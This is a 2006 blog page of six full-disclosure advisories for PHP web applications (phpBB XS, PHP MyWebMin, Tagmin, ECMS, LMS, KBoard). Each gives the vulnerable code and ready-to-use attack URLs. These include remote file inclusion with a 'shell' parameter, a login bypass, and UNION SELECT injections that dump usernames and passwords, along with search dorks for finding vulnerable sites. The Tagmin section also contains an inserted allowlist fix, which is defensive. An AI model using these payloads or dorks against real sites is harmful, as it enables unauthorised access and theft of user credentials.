Friday, September 29, 2006

phpBB XS (phpbb_root_path) Remote File Inclusion Spanish Version

#######################################
+Advisory #6
+phpBB XS (phpbb_root_path) Remote File Inclusion
+Note: Spanish version
+Develop:http://www.elanzuelo.es/phpbb.tar.gz
+Dork: "Traduccion Espanol por phpBB-Es"
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

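Vulnerable File: includes/functions_kb.php
<?php
// ...
// The include path is prefixed with $phpbb_root_path, which the example URL below sets from the request
include_once($phpbb_root_path.'includes/functions_color_groups.'.$phpEx);
// ...
?>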


Example:
http://site/path/includes/functions_kb.php?phpbb_root_path=shell

Thursday, September 28, 2006

PHP MyWebMin 1.0 Remote File Include

#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product :PHP MyWebMin
+Develop:
+www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk:High
+Class:Remote
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

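Vulnerable File: window.php
<?php
// $target is used directly as the directory to open
$ordner = opendir("$target");
?>

and

<?php
// $target and $action both reach include() unchecked in this excerpt
include("$target/preferences.php");

if($action != "")
{
include("$action.php");
}
?>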

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php

ECMS 2.0 SQL Injection and Security Bypass

#######################################
+ECMS 2.0 SQL Injection and Security Bypass
+Advisory #4
+Product :ECMS 2.0
+Develop : http://www.evaria.com
+Vulnerable: SQL injection & Security bypass
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Examples:
#Security bypass
login: admin'/*

#SQL Injection:
http://[TARGET]/ecms/en/?choice=section&xid=[SQL code]
http://[TARGET]/ecms/en/?choice=section&xid=4'UNION SELECT lastlogin,passwd FROM authuser/*
http://[TARGET]/ecms/en/?choice=section&xid=4'UNION SELECT id,uname FROM authuser/*

Tagmin C.C 2.1.B Remote File Include

########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Develop: http://ds3.bbminc.net/tagit2b/
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
<?php
// $page reaches include() unchecked in this excerpt; only $_GET['load'] is compared
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell
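
The Tagmin dispatch above with the include target constrained to an allowlist, as an added example that is not part of the original advisory or the project's code. It assumes `$page` is populated from the request (as the example URL implies); `PAGES`, `DEFAULT_PAGE`, `resolve_page()` and the two page script names are hypothetical.

```php
<?php
// Added example, not Tagmin code: allowlist dispatch in place of include("$page.php").
// PAGES, DEFAULT_PAGE and resolve_page() are hypothetical names; the page
// scripts in PAGES are assumed, the advisory does not list them.
const PAGES = [
    'dtu' => 'dtu.php',
    'tag' => 'tag.php',
];
const DEFAULT_PAGE = 'tagviewer.php'; // fallback taken from the original else branch

function resolve_page(array $query): string
{
    $load = $query['load'] ?? null;
    $page = $query['page'] ?? null;

    // Query values can arrive as arrays (page[]=x); accept strings only.
    if (!is_string($load) || !is_string($page)) {
        return DEFAULT_PAGE;
    }
    // Strict comparison against the two values the original code accepts.
    if (!in_array($load, ['dtu', 'tag'], true)) {
        return DEFAULT_PAGE;
    }
    // The request value is only a lookup key; it never becomes part of a path,
    // so URLs, "../" sequences and absolute paths all fall through to the default.
    return PAGES[$page] ?? DEFAULT_PAGE;
}

// Constructed sample requests (not taken from real traffic).
$samples = [
    ['load' => 'dtu', 'page' => 'dtu'],
    ['load' => 'tag', 'page' => 'http://example.invalid/x'],
    ['load' => 'tag', 'page' => '../../etc/passwd'],
    ['load' => 'tag', 'page' => ['dtu']],
    ['page' => 'tag'],
];
foreach ($samples as $query) {
    echo json_encode($query), ' => ', resolve_page($query), PHP_EOL;
}

// In index.php the include then becomes:
//   include __DIR__ . '/' . resolve_page($_GET);
```

Setting `allow_url_include = Off` in php.ini stops `include` from fetching URLs, but a variable include path can still pull in local files, so the allowlist is the actual fix.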

LMS 1.12 SQL Injection

########################################
+Advisory #2
+LMS 1.12 SQL Injection
+Product :Learning Management Systems
+Develop :http://learning-management-system.info
+Vulnerable: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable:

http://site/path/index.php?sub=students&action=edit&user_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users/*

http://site/path/index.php?sub=messages&action=det&msg_id=8888'UNION SELECT user_id, user_name, user_email, user_login, user_password, user_level, user_number, student_class FROM site_users WHERE user_id=6/*

KBoard v0.6 SQL Injection

#######################################
+Advisory #1
+KBoard v0.6 SQL Injection
+Product : KBoard Forum v0.6
+Develop : http://sourceforge.net/project/showfiles.php?group_id=92748
+Class: SQL injection
+Risk:High
+Discovered:by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa;)
########################################
~Auth:

Examples:
--------
index.php?id='[SQL]
user_posthistory.php?search_id='[SQL]
user_profile.php?id='[SQL]
forum_threadlist.php?forum_id='[SQL]
post_thread.php?forum_id='[SQL]
thread_view.php?thread_id='[SQL]
thread_view.php?forum_id='[SQL]
addressbook_add.php?id='[SQL]
account_edit.php?accountselected=1&aid='[SQL]


Vulnerable:

http://site/path/index.php?id=991199'UNION SELECT id,id,password,password,sig,id FROM accounts/*